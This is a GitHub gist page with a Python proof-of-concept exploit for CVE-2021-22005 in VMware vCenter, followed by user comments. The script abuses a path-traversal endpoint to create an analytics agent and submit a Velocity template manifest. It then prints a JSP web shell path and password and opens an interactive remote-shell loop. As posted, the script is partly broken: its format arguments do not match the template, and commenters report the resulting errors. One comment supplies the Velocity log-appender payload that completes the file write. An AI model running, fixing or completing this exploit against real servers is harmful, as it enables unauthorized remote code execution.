Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2021-22005_PoC.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
_str = _str.replace("&", "&")
_str = _str.replace("<", "&lt;")
_str = _str.replace(">", "&gt;")
_str = _str.replace("\"", "&quot;")
return _str
def run_shell(url, pwd, cmd):
burp0_url = url
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {pwd: cmd.strip()}
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
ct = ct.split('<pre>')[1].split('</pre>')[0]
return ct
def createAgent(url, agent_name):
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" }
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)
pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
manifestData = """<manifest recommendedPageSize="500">
<request>
<query name="vir:VCenter">
<constraint>
<targetType>ServiceInstance</targetType>
</constraint>
<propertySpec>
<propertyNames>content.about.instanceUuid</propertyNames>
<propertyNames>content.about.osType</propertyNames>
<propertyNames>content.about.build</propertyNames>
<propertyNames>content.about.version</propertyNames>
</propertySpec>
</query>
</request>
<cdfMapping>
<indepedentResultsMapping>
<resultSetMappings>
<entry>
<key>vir:VCenter</key>
<value>
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
<resourceItemToJsonLdMapping>
<forType>ServiceInstance</forType>
<mappingCode><![CDATA[
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
$obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
$obj.addProperty("BUILD", $content-about-build)##
$obj.addProperty("VERSION", $content-about-version)##]]>
</mappingCode>
</resourceItemToJsonLdMapping>
</value>
</value>
</entry>
</resultSetMappings>
</indepedentResultsMapping>
</cdfMapping>
<requestSchedules>
<schedule interval="1h">
<queries>
<query>vir:VCenter</query>
</queries>
</schedule>
</requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)
target = sys.argv[1]
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print "Success!"
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
while True:
cmd = raw_input("/remote_shell/# ").strip()
if(cmd =="quit"):
sys.exit(-1)
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
time.sleep(1)
print(output)
@johnjohnsp1

This comment has been minimized.

Copy link

@johnjohnsp1 johnjohnsp1 commented Sep 24, 2021

nice but:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
File "C:\temp\cve20212022\CVE20212022.py", line 86
print "Target: "+ target
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Target: "+ target)?
(cve20212022) PS C:\temp\cve20212022> notepad++.exe
(cve20212022) PS C:\temp\cve20212022> notepad++.exe
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
File "C:\temp\cve20212022\CVE20212022.py", line 87
print "Creating Agent (of SHIELD) ..."
^
SyntaxError: invalid syntax

@saaa39d

This comment has been minimized.

Copy link

@saaa39d saaa39d commented Sep 24, 2021

u can fix it easly by editing print line from
print ""
To
print("")

@johnjohnsp1

This comment has been minimized.

Copy link

@johnjohnsp1 johnjohnsp1 commented Sep 24, 2021

thanks it worked out but now this:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
Traceback (most recent call last):
File "C:\temp\cve20212022\CVE20212022.py", line 36, in
manifestData = """
TypeError: not all arguments converted during string formatting

any ideas ? your video poc is pretty smooth

@meetgyn

This comment has been minimized.

Copy link

@meetgyn meetgyn commented Sep 24, 2021

image
image
even putting () in the prints continues to give error
image

@MUWASEC

This comment has been minimized.

Copy link

@MUWASEC MUWASEC commented Sep 25, 2021

to anyone wondering you just need to modify mappingCode to execute velocity payload, this is unfinished poc so suit yourself

@c3l3si4n

This comment has been minimized.

Copy link

@c3l3si4n c3l3si4n commented Sep 25, 2021

did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?

@mkunz7

This comment has been minimized.

Copy link

@mkunz7 mkunz7 commented Sep 28, 2021

It looks like this is being exploited in the wild a simpler way by writing a json file to /etc/cron.d/ without doing the velocity template injection https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005 Are you going to publish a full poc?

@adamick098

This comment has been minimized.

@b4sh1t1

This comment has been minimized.

Copy link

@b4sh1t1 b4sh1t1 commented Oct 4, 2021

replace

                    <![CDATA[
                    #set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
                    #set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
                    #set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
                    $obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
                    $obj.addProperty("BUILD", $content-about-build)##
                    $obj.addProperty("VERSION", $content-about-version)##]]>
                 </mappingCode>

with

                      <![CDATA[    
                        #set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
                        #set($orig_log = $appender.getFile())##
                        #set($logger = $GLOBAL-logger.logger.parent)##     
                        $appender.setFile("%s")##     
                        $appender.activateOptions()##  
                        $logger.warn("%s")##   
                        $appender.setFile($orig_log)##     
                        $appender.activateOptions()##]]>
                     </mappingCode>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment